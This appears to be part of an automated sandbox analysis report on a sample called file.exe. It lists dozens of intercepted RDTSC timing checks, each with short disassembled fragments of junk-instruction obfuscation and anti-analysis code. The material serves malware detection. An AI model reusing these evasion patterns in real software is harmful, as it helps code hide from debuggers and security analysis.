                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37D93 second address: D37E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F6999135DE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1BEAh], edx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F6999135DE8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 sub di, B806h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F6999135DE8h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 add dword ptr [ebp+122D1F47h], edx 0x0000006b xchg eax, esi 0x0000006c pushad 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36147 second address: D3614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36FB3 second address: D36FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E13 second address: D37E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E27 second address: D38E48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6999135DF3h 0x00000008 jmp 00007F6999135DEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jbe 00007F6999135DECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39E1B second address: D39E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F699913D2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E48 second address: D38E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AE6F second address: D3AE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39E25 second address: D39E38 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6999135DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39E38 second address: D39E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39E3C second address: D39E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F626 second address: D3F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D1D0 second address: D3D1D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F62F second address: D3F633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6CD second address: D3F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6D1 second address: D3F6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F6D5 second address: D3F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40617 second address: D4061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8CC second address: D3F8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4270D second address: D42711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48A09 second address: D48A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48CC1 second address: D48CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D306h 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48CDF second address: D48CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E2AD second address: D4E2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E4D2 second address: D4E4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E4ED second address: D4E4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E4F1 second address: D4E4FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E4FB second address: D4E530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F699913D304h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E530 second address: D4E54A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jc 00007F6999135DE6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D532A4 second address: D532B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D532B0 second address: D532D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6999135DF5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51F17 second address: D51F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F699913D307h 0x0000000c jc 00007F699913D2F6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51F3C second address: D51F6D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6999135E00h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jo 00007F6999135DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51F6D second address: D51F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D306h 0x00000009 popad 0x0000000a jmp 00007F699913D2FBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D525BB second address: D525C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52750 second address: D52762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FDh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52895 second address: D528C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6999135DEAh 0x0000000b pop edi 0x0000000c pushad 0x0000000d ja 00007F6999135DF3h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F6999135DEBh 0x0000001a push esi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop esi 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52B51 second address: D52B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FBh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52B66 second address: D52B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D548F6 second address: D5490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F699913D2FFh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F97 second address: D58F9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C301 second address: D2C351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+12445B9Fh], ebx 0x0000000d lea eax, dword ptr [ebp+1247E00Dh] 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F699913D2F8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dx, si 0x00000030 nop 0x00000031 push edx 0x00000032 jnp 00007F699913D2FCh 0x00000038 jo 00007F699913D2F6h 0x0000003e pop edx 0x0000003f push eax 0x00000040 pushad 0x00000041 js 00007F699913D2FCh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C996 second address: D2C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C99F second address: D2C9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C9A3 second address: D2C9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6999135DF2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C9C0 second address: D2C9C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CD3C second address: D2CD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D2379h], esi 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F6999135DE8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CD76 second address: D2CD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CD7A second address: D2CD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CD8F second address: D2CD95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D4B2 second address: D2D4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D5CC second address: D0BF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 call dword ptr [ebp+122D1F4Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D303h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58042 second address: D58046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58046 second address: D5804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5804C second address: D58056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58056 second address: D5805A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5805A second address: D58092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6999135DF2h 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F6999135DF2h 0x00000013 jne 00007F6999135DE6h 0x00000019 jl 00007F6999135DE6h 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push edx 0x00000023 pop edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5835D second address: D58369 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F699913D2F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58369 second address: D5836E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58620 second address: D58624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5878F second address: D587A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F6999135DE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D587A4 second address: D587BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F699913D2F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58A8F second address: D58AC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F6999135DE6h 0x0000000d jmp 00007F6999135DF9h 0x00000012 jns 00007F6999135DE6h 0x00000018 popad 0x00000019 pushad 0x0000001a jp 00007F6999135DE6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AC5 second address: D58ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58ACB second address: D58AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6999135DE6h 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6999135DEFh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AEB second address: D58AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F582 second address: D5F588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F588 second address: D5F592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F592 second address: D5F596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DFB7 second address: D5DFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E558 second address: D5E585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jg 00007F6999135DEEh 0x00000015 push esi 0x00000016 pop esi 0x00000017 ja 00007F6999135DE6h 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jp 00007F6999135DE6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E585 second address: D5E589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E6E1 second address: D5E6EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E6EB second address: D5E6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E6EF second address: D5E718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEDh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6999135DF3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EC0C second address: D5EC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EC10 second address: D5EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDA1 second address: D5EDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 pop edx 0x0000000a jno 00007F699913D30Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDCE second address: D5EDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDD2 second address: D5EDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDD6 second address: D5EE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F6999135DF5h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 js 00007F6999135DEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE00 second address: D5EE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE06 second address: D5EE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE0B second address: D5EE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F699913D2F6h 0x0000000a jbe 00007F699913D2F6h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F3A2 second address: D5F3C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6999135DEAh 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F3C2 second address: D5F3E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 je 00007F699913D2F8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007F699913D2FCh 0x00000015 jne 00007F699913D2F6h 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F3E4 second address: D5F3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D689C5 second address: D689C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
